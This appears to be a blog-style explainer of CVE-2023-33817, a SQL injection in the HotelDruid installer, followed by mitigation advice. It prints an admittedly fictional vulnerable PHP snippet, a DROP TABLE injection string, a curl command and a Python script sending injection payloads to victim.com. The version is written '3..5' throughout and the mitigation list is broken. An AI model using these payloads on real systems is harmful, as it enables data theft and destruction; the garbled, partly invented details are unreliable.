CVE CyberSecurity Database News

CVE-2023-33817 - SQL Injection Vulnerability in HotelDruid v3..5 Explained

Poster -

In mid-2023, a critical security vulnerability was found in HotelDruid, an open-source hotel management system used by thousands of small hotels and bed and breakfasts worldwide. The vulnerability, tracked as CVE-2023-33817, allows hackers to perform a SQL injection attack in HotelDruid version 3..5. This means attackers can gain unauthorized access to your database, extract sensitive information, or even damage the system.

This post breaks down what the vulnerability is, how bad it is, how attackers can exploit it, and what you can do to stay safe. We use simple language and examples, so you don’t have to be a cybersecurity expert to understand.

What is HotelDruid?

HotelDruid is free, open-source hotel management software, popular for reservation management, invoicing, and more. It’s written in PHP and works with MySQL (MariaDB) databases.

What is CVE-2023-33817?

CVE-2023-33817 is an identifier given to a particular SQL injection vulnerability present in HotelDruid v3..5. It was discovered and detailed by security researchers in this report.

A SQL injection happens when user input is not properly checked and cleaned, so hackers can send dangerous SQL queries to the database, potentially leading to data theft or tampering.

Where is the Vulnerability?

The vulnerability is due to improper validation of user input in the include/install.php file in HotelDruid version 3..5.

Specifically, an attacker can inject arbitrary SQL code into database queries by manipulating data submitted to the application installer.

Let’s look at a simplified (fictional, but realistic) code overview

// (This is for demonstration. The real code may be different)
$user = $_POST['username'];
$pass = $_POST['password'];

$query = "INSERT INTO users (username, password) VALUES ('$user', '$pass')";
mysqli_query($conn, $query);

If $user is not sanitized, an attacker could send admin'); DROP TABLE users; -- as the username, which would result in:

INSERT INTO users (username, password) VALUES ('admin'); DROP TABLE users; --', 'somepassword')

The DROP TABLE users; part is malicious — it can delete your user table!

Exploit Example

Let’s see how a trivial exploit might look using a common web request tool like curl.

Assume a POST parameter username in the installer.

curl -X POST "http://victim.com/hoteldruid/include/install.php"; \
  -d "username=attacker' OR 1=1--&password=dummy"

This input could cause the SQL statement to always return true (1=1), allowing the attacker to bypass authentication or extract user lists.

Here’s a basic Python script that automates the attack (for educational purposes only!)

import requests

target_url = 'http://victim.com/hoteldruid/include/install.php';

payload = {
    'username': "admin' -- ",
    'password': 'irrelevant'
}

response = requests.post(target_url, data=payload)
print(response.text)

If the site is vulnerable, this could let the attacker log in as admin or even drop tables in the database.

Mitigation

1. Update Immediately: Always use the latest version of HotelDruid, as later versions may patch known holes.
2. Input Validation: Always sanitize and validate user input. Never trust POST or GET parameters directly.

`

4. Restrict Installer: Make sure include/install.php cannot be accessed after setup.

References

- Official CVE Detail
- HotelDruid Website
- OWASP: SQL Injection

Conclusion

CVE-2023-33817 in HotelDruid v3..5 shows how dangerous SQL injection bugs can be. If you’re running an affected version, you should update immediately and audit your PHP code for similar input validation issues. Never leave installation scripts accessible after deploying web applications — and remember, securing your user data protects your business and your guests!

Timeline

Published on: 06/13/2023 21:15:00 UTC
Last modified on: 06/17/2023 03:12:00 UTC